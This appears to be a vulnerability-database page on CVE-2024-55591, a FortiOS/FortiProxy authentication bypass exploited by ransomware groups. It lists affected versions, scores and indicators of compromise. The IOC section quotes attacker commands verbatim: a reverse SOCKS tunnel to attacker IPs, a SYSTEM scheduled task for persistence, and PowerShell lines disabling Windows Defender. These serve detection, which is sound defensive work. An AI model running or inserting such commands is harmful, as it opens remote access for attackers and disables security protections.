cbcvebase.
CVE-2024-55591
published 2025-01-14

CVE-2024-55591: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0…

PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-01-21
Exploited in the wild
EPSS
98.26%
99.9th percentile
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.

Affected

8 ranges
VendorProductVersion rangeFixed in
fortinetfortios
fortinetfortios>= 7.0.0 < 7.0.177.0.17
fortinetfortios7.0.0 – 7.0.16
fortinetfortiproxy
fortinetfortiproxy>= 7.0.0 < 7.0.207.0.20
fortinetfortiproxy7.0.0 – 7.0.19
fortinetfortiproxy>= 7.2.0 < 7.2.137.2.13
fortinetfortiproxy7.2.0 – 7.2.12

Detection & IOCsextracted from sources · hover to see the quote

ip193.233.202.17
ip77.110.122.137
port44729
port37182
filenamesvchost32.exe
pathC:\Windows\Temp\svchost32.exe
filenamewin.exe
filenameREADME-GENTLEMEN.txt
other.fjn1jw
commandC:\Users\REDACTED\Documents\win.exe --password REDACTED --T 200 --superfast
commandC:\Windows\Temp\svchost32.exe client 193.233.202[.]17:44729 R:1081:socks
commandcmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1
commandpowershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled
commandpowershell -Command Set-MpPreference -DisableRealtimeMonitoring $true -Force
commandpowershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled -Force
commandpowershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force
commandpowershell -Command Add-MpPreference -ExclusionPath C:\ -Force
otherforticloud-tech
otherfortigate-firewall
otheradnimistrator
pathC:\Windows\Temp\RbHoNVNU.tmp
  • CVE-2024-55591 exploitation uses WebSocket-based attacks via the jsconsole interface or direct HTTPS requests to exposed firewall management interfaces to gain super_admin privileges
  • CVE-2024-55591 exploitation involves crafted requests to the Node.js websocket module; monitor FortiOS/FortiProxy management interface for anomalous WebSocket connections
  • Post-exploitation: watch for creation of rogue local/admin accounts on FortiGate devices, especially accounts named forticloud-tech, fortigate-firewall, or adnimistrator (note typo), and addition to SSL VPN user groups
  • jsconsole usage was a common thread across CVE-2024-55591 exploitation intrusions; monitor FortiGate logs for jsconsole activity from unexpected source IPs
  • CVE-2024-55591 mass-exploitation campaign followed four phases: vulnerability scanning (Nov 16–23), reconnaissance (Nov 22–27), SSL VPN configuration (Dec 4–7), lateral movement (Dec 16–27, 2024)
  • Detect The Gentlemen ransomware post-exploitation: look for Scheduled Task named 'WindowsConnSvc' executing svchost32.exe from C:\Windows\Temp with SOCKS proxy arguments, running every 2 minutes as SYSTEM
  • Detect The Gentlemen ransomware: ransom note filename README-GENTLEMEN.txt and encrypted file extension .fjn1jw are unique indicators for file-based detection
  • Detect defense evasion: PowerShell commands disabling WinDefend service and adding C:\ as an exclusion path are strong indicators of pre-ransomware activity
  • Monitor Windows Event Log clearing: Event ID 104 (Application/System logs cleared) and Event ID 1102 (Security log cleared) observed in The Gentlemen attacks post-CVE-2024-55591 exploitation
  • SuperBlack ransomware (Mora_001) post-exploitation: attacker modifies firewall automation tasks to recreate rogue admin accounts if removed; monitor FortiGate automation task changes
  • SuperBlack ransomware deploys a wiper called WipeBlack after encryption to remove ransomware executable traces; also used by BrainCipher, EstateRansomware, and SenSayQ ransomware
  • ·CVE-2024-55591 affects FortiOS 7.0.0–7.0.16 and FortiProxy 7.0.0–7.0.19 and 7.2.0–7.2.12; patched in FortiOS 7.0.17+ and FortiProxy 7.0.20/7.2.13+. Customers who patched for CVE-2024-55591 are also protected against CVE-2025-24472.
  • ·Fortinet confirmed CVE-2025-24472 was NOT exploited in the wild at time of disclosure; only CVE-2024-55591 was confirmed exploited. Patching for CVE-2024-55591 covers both.
  • ·If patching is not immediately possible, Fortinet advises disabling the HTTP/HTTPS administrative interface or restricting access via local-in policies to limit exposure to CVE-2024-55591.
  • ·CVE-2024-55591 was exploited as a zero-day since at least mid-November 2024, before Fortinet's January 14, 2025 disclosure; organizations should assume potential compromise if management interfaces were internet-exposed during that window.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.